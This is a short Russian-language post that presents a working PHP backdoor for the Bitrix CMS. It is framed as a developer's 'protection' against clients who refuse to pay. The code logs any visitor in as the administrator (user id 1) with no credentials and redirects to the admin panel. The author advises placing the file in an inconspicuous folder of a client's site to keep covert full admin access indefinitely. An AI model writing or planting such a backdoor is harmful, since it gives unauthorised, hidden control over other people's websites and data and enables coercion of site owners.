Рассмотрим простой бэкдор для битрикса в качестве не бэкдора, как его принято воспринимать, а как, наоборот, способ защититься от кидалова клиента, ну и простой и легкий способ быстро авторизоваться на сайте под любым пользователем.
Очень часто слышу жалобы и негодования дизайнеров на клиентов, мол кинули на денежку, забрали макет и не отдали денюжку, списав это на то, что макет не понравился и все такое в этом роде. В нашем же случае все намного проще. Программист в таких случаях считается хозяином ситуации, потому что у него всегда есть свои меры безопасности.
Давайте рассмотрим простой бэкдор на битриксе:
//бэкдор битрикс <? require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php"); //подключаем хидер global $USER; //объявляем переменную $USER $USER->Authorize(1); //авторизовываем пользователя под id = 1(в нашем случае админ) LocalRedirect("/bitrix/admin/"); //отправляем в админскую панель ?>
Идея такая, закидываем файл с данным содержанием в какую-нибудь несистемную папку сайта. Скрипт запускает авторизацию указанного пользователя и кидает нас в админку сайта. Такой подход дает кучу различных преимуществ, пока файл на сервере в нужном месте, у вас всегда есть возможность зайти под админом и быть в курсе всех событий на сайте, имея все права и полномочия админа =)